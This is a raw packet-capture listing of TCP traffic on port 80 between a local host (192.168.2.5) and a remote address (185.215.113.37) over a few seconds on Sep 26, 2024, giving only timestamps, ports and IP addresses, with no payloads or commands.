Sep 26, 2024 21:14:09.283318996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.283339024 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.283365965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284285069 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284296036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284305096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284315109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284326077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284333944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284337044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284348965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284357071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284359932 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284369946 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284375906 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284380913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284393072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.284399033 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284419060 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.284445047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.286137104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286149979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286159992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286191940 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.286225080 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.286943913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286959887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286968946 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286978960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286988974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.286999941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287009001 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287019014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287019968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287019968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287031889 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287043095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287050962 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287050962 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287053108 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287064075 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287071943 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287075996 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287096977 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287113905 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287885904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287930012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287941933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287942886 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287952900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287964106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287975073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287976027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.287985086 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287997007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.287998915 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288016081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288023949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288037062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288067102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288582087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288634062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288762093 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288774014 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288784027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288794041 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288803101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288813114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288815022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288822889 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288835049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.288839102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288861036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.288877010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.304653883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304666042 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304675102 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304718018 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.304718971 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.304815054 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304825068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304835081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304845095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.304891109 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.304923058 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.305035114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.305087090 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.370903015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.370975018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.370985031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.370987892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371076107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371146917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371156931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371166945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371172905 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371196032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371222973 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371381044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371436119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371514082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371525049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371534109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371543884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371553898 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371562004 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371563911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371576071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371586084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.371589899 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371599913 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.371625900 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372304916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372315884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372320890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372324944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372329950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372334957 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372344971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372354031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372360945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372366905 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372378111 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372380018 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372389078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372394085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372400045 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372411966 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.372415066 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372447014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.372459888 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373234034 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373245001 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373253107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373262882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373271942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373281956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373286009 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373292923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373302937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373311996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373312950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373323917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373330116 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373334885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373344898 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373347998 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373354912 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.373361111 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.373392105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374453068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374464989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374475002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374484062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374494076 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374502897 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374506950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374512911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374524117 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374525070 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374536037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374537945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374547958 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374557972 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374560118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374568939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374578953 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374579906 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374592066 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.374602079 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374624014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.374648094 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375108004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375118971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375128031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375138044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375154018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375157118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375164986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375174999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375183105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375186920 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375195026 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375199080 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375212908 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375219107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375224113 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375232935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375247002 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375261068 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375277042 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375931978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375942945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375952005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375962019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375972033 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375982046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.375983953 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.375993967 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376003981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376004934 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376013994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376019955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376024961 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376034975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376044035 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376044035 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376044989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376076937 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376092911 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376817942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376832962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376842022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376852989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376863003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376873016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.376873016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376898050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.376913071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.377199888 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.377209902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.377219915 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.377232075 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.377243996 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:09.377249956 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.377276897 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.377290964 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.673676014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:09.678544044 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:10.407715082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:10.407841921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:10.487567902 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:10.492418051 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:11.222312927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:11.222398996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:11.866226912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:11.871130943 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:12.593301058 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:12.593489885 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:12.955406904 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:12.960325003 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185301065 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185332060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185343981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185530901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185542107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185545921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185553074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185545921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185565948 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185653925 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185653925 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185653925 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185802937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185815096 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185826063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185839891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185852051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185853004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.185879946 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.185895920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.316977024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317011118 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317028046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317163944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317179918 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317194939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317192078 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317193031 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317212105 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317255974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317255974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317281008 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317441940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317456007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317471027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317487955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317492962 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317528009 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317528009 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317585945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317687035 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317704916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317740917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317771912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317843914 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317858934 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317874908 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317889929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317893028 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317908049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317920923 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317920923 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317926884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317943096 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317949057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.317969084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317969084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.317997932 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.318284988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.318300009 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.318336010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.318367958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.407665014 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.407697916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.407799006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.407799006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.449847937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.449892998 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.449908972 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450045109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450061083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450067043 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450067043 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450123072 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450123072 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450149059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450165987 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450206995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450270891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450285912 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450299978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450313091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450326920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450357914 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450376987 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450577974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450601101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450617075 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450630903 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450637102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.450649023 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.450659990 CEST	49705	80	192.168.2.5	185.215.113.37
